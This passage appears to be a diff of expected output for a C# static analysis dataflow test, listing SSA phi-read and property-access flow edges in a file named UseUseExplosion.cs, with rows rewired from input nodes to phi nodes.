variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1813:24:1818 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1813:24:1818 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1817:24:1817 | access to local variable x | UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1817:24:1817 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1828:24:1833 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1828:24:1833 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1832:24:1832 | access to local variable x | UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1832:24:1832 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1843:24:1848 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1843:24:1848 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1847:24:1847 | access to local variable x | UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1847:24:1847 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1858:24:1863 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1858:24:1863 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1862:24:1862 | access to local variable x | UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1862:24:1862 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1873:24:1878 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1873:24:1878 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1877:24:1877 | access to local variable x | UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1877:24:1877 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1888:24:1893 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1888:24:1893 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1892:24:1892 | access to local variable x | UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1892:24:1892 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1903:24:1908 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1903:24:1908 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1907:24:1907 | access to local variable x | UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1918:24:1923 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1918:24:1923 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1907:24:1907 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1918:24:1923 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1918:24:1923 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1918:24:1923 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1922:24:1922 | access to local variable x | UseUseExplosion.cs:24:1918:24:1923 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1933:24:1938 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1933:24:1938 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1922:24:1922 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1933:24:1938 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1933:24:1938 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1933:24:1938 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1937:24:1937 | access to local variable x | UseUseExplosion.cs:24:1933:24:1938 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1948:24:1953 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1948:24:1953 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1937:24:1937 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1948:24:1953 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1948:24:1953 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1948:24:1953 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1952:24:1952 | access to local variable x | UseUseExplosion.cs:24:1948:24:1953 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1963:24:1968 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1963:24:1968 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1952:24:1952 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1963:24:1968 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1963:24:1968 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1963:24:1968 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1967:24:1967 | access to local variable x | UseUseExplosion.cs:24:1963:24:1968 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1978:24:1983 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1978:24:1983 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1967:24:1967 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1978:24:1983 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1978:24:1983 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1978:24:1983 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1982:24:1982 | access to local variable x | UseUseExplosion.cs:24:1978:24:1983 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1993:24:1998 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1993:24:1998 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1982:24:1982 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1993:24:1998 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1993:24:1998 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1993:24:1998 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1997:24:1997 | access to local variable x | UseUseExplosion.cs:24:1993:24:1998 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2008:24:2013 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2008:24:2013 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1997:24:1997 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2008:24:2013 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2008:24:2013 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2008:24:2013 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2012:24:2012 | access to local variable x | UseUseExplosion.cs:24:2008:24:2013 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2023:24:2028 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2023:24:2028 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2012:24:2012 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2023:24:2028 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2023:24:2028 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2023:24:2028 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2027:24:2027 | access to local variable x | UseUseExplosion.cs:24:2023:24:2028 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2038:24:2043 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2038:24:2043 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2027:24:2027 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2038:24:2043 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2038:24:2043 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2038:24:2043 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2042:24:2042 | access to local variable x | UseUseExplosion.cs:24:2038:24:2043 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2053:24:2058 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2053:24:2058 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2042:24:2042 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2053:24:2058 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2053:24:2058 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2053:24:2058 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2057:24:2057 | access to local variable x | UseUseExplosion.cs:24:2053:24:2058 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2068:24:2073 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2068:24:2073 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2057:24:2057 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2068:24:2073 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2068:24:2073 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2068:24:2073 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2072:24:2072 | access to local variable x | UseUseExplosion.cs:24:2068:24:2073 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2083:24:2088 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2083:24:2088 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2072:24:2072 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2083:24:2088 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2083:24:2088 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2083:24:2088 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2087:24:2087 | access to local variable x | UseUseExplosion.cs:24:2083:24:2088 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2098:24:2103 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2098:24:2103 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2087:24:2087 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2098:24:2103 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2098:24:2103 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2098:24:2103 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2102:24:2102 | access to local variable x | UseUseExplosion.cs:24:2098:24:2103 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2113:24:2118 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2113:24:2118 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2102:24:2102 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2113:24:2118 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2113:24:2118 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2113:24:2118 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2117:24:2117 | access to local variable x | UseUseExplosion.cs:24:2113:24:2118 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2128:24:2133 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2128:24:2133 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2117:24:2117 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2128:24:2133 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2128:24:2133 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2128:24:2133 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2132:24:2132 | access to local variable x | UseUseExplosion.cs:24:2128:24:2133 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2143:24:2148 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2143:24:2148 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2132:24:2132 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2143:24:2148 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2143:24:2148 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2143:24:2148 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2147:24:2147 | access to local variable x | UseUseExplosion.cs:24:2143:24:2148 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2158:24:2163 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2158:24:2163 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2147:24:2147 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2158:24:2163 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2158:24:2163 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2158:24:2163 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2162:24:2162 | access to local variable x | UseUseExplosion.cs:24:2158:24:2163 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2173:24:2178 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2173:24:2178 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2162:24:2162 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2173:24:2178 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2173:24:2178 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2173:24:2178 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2177:24:2177 | access to local variable x | UseUseExplosion.cs:24:2173:24:2178 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2188:24:2193 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2188:24:2193 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2177:24:2177 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2188:24:2193 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2188:24:2193 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2188:24:2193 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2192:24:2192 | access to local variable x | UseUseExplosion.cs:24:2188:24:2193 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2203:24:2208 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2203:24:2208 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2192:24:2192 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2203:24:2208 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2203:24:2208 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2203:24:2208 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2207:24:2207 | access to local variable x | UseUseExplosion.cs:24:2203:24:2208 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2218:24:2223 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2218:24:2223 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2207:24:2207 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2218:24:2223 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2218:24:2223 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2218:24:2223 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2222:24:2222 | access to local variable x | UseUseExplosion.cs:24:2218:24:2223 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2233:24:2238 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2233:24:2238 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2222:24:2222 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2233:24:2238 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2233:24:2238 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2233:24:2238 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2237:24:2237 | access to local variable x | UseUseExplosion.cs:24:2233:24:2238 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2248:24:2253 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2248:24:2253 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2237:24:2237 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2248:24:2253 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2248:24:2253 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2248:24:2253 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2252:24:2252 | access to local variable x | UseUseExplosion.cs:24:2248:24:2253 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2263:24:2268 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2263:24:2268 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2252:24:2252 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2263:24:2268 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2263:24:2268 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2263:24:2268 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2267:24:2267 | access to local variable x | UseUseExplosion.cs:24:2263:24:2268 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2278:24:2283 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2278:24:2283 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2267:24:2267 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2278:24:2283 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2278:24:2283 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2278:24:2283 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2282:24:2282 | access to local variable x | UseUseExplosion.cs:24:2278:24:2283 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2293:24:2298 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2293:24:2298 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2282:24:2282 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2293:24:2298 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2293:24:2298 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2293:24:2298 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2297:24:2297 | access to local variable x | UseUseExplosion.cs:24:2293:24:2298 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2308:24:2313 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2308:24:2313 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| 